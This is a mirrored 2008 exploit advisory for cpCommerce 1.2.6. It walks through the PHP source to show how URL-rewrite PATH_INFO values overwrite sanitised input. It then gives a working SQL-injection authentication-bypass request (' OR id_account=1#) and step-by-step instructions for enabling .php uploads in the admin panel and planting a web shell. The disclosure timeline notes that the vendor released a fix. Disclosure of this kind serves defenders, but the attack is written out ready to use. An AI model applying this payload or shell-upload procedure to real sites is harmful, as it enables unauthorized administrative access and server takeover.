首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass PoC
来源:vfocus.net 作者:vfocus 发布时间:2008-12-01  
 Author:	girex
 Homepage:	girex.altervista.org

 CMS:		cpCommerce 1.2.6
 Site:		http://cpcommerce.cpradio.org/

 Bug: 		URL Rewrite -> Input variables overwrite
 PoC:		Auth bypass -> Shell upload

 Note:		Works regardless php.ini settings

 Vendor informed:		23/11/08
 cpCommerce 1.2.7 released: 	30/11/08 
 Public advisory:		30/11/08

-------------------------------------------------------------------------------------------------

 CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.

-------------------------------------------------------------------------------------------------

 Vulnerability discussion:
 cpCommerce sets register_globals to Off with ini_set
 and stores all GET and POST variables into $input array after have addslashed them.

 lines: 16-32
 file: /functions/sanitize_value.func.php 

      function SanitizeInput()
      {
        $input = array();
        if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
        {
          foreach ($_GET as $key => $val)
          {
            if (is_array($val))
            {
              $input[$key] = SanitizeArray($val);
            }
            else
            {
              $input[$key] = SanitizeValue($val);
            }
          }
        }

  ... and does the same for POST vars
  
 lines: 3-13

      function SanitizeValue($value)
      {
        if (!get_magic_quotes_gpc())
        {
          return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
        }
        else
        {
          return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
        }
      }

-------------------------------------------------------------------------------------------------
  
 Let we see _funcions.php (the mainfile)

 lines: 128-132
 file: _functions.php

      $input = array();
      if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
      {
         $input = SanitizeInput();
      }


 So, all GET and POST vars ar sanitized and stored into $input array.
 Let we procede in _functions.php...

-------------------------------------------------------------------------------------------------

 lines 156-173
 file: _functions.php
 
      if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
      {
        $rewriteValues = array();
        if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
        {
          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
        }
        else
        {
          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
        }
     
        for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
        {
          $input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
        }
      }


 $_SERVER['PATH_INFO'] is a SERVER var that contains the request url after the request page

 For example: GET http://localhost/index.php/helloword
 /index.php is the page requested and $_SERVER['PATH_INFO'] contains /helloword

 As you can see from previous snipplet of code we can set $input content with
 GET index.php/key/value/

 So we can overwrite all inputs data in this cms, bypassing SanitazeInput()
 and the effect of magic_quotes 
 
 How we'll exploit that....

-------------------------------------------------------------------------------------------------
 
 lines: 13-20
 code: /actions/login.act.php

      if (checkSession($input['email'], md5($input['password']))) {
        $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
        $return['url'] = urldecode("{$input['returnurl']}");
      } else {

        $_SESSION['loginerror'] = TRUE;
        $return['url'] = urldecode("{$input['returnurl']}");
      }

 If checkSession returns true we are logged in...

 lines: 3-9
 code: /functions/account_info.func.php

      function checkSession($email,$pass) {
        global $config, $db_chooser;

         $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
                           "email='$email' and pass='$pass'";

         $accounts = $db_chooser->sql_query($sql['accounts']);


 We can manipulate this query having a SQL Injection with an auth bypass
 logging in with admin priviledges...

-------------------------------------------------------------------------------------------------

 If we set $input['email'] to: ' OR id_account=1#  with the trick of PATH_INFO (index.php/email/value)
 the resulting query will be:  select `id_account`, `level` from cpAccounts where email='' OR id_account=1

-------------------------------------------------------------------------------------------------

 PoC Auth Bypass:  

 GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php

-------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------

 If you want to upload a shell:

- Log in with the auth bypass PoC
- Go to /[path]/admin/

- Go to General Info -> Configuration
- Add ,php in  What Image Extensions do you want to accept on Uploads?

- Go to Product -> Create
- Select a right category
- Fill required fields
- Upload your shell.php in Product Thumbnail Image
- Save all

 Your shell wil be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php

-------------------------------------------------------------------------------------------------

# [2008-11-30]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Electronics Workbench (EWB Fil
·Minimal Ablog 0.4 (SQL/FU/Bypa
·Cain & Abel <= v4.9.24 .RDP St
·KTP Computer Customer Database
·Andy's PHP Knowledgebase 0.92.
·KTP Computer Customer Database
·Debian GNU/Linux (symlink atta
·Quick Tree View .NET 3.1 (qtv.
·Maxum Rumpus 6.0 Multiple Remo
·Active Business Directory v 2
·bcoos 1.0.13 (viewcat.php cid)
·Active Time Billing 3.2 (Auth
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved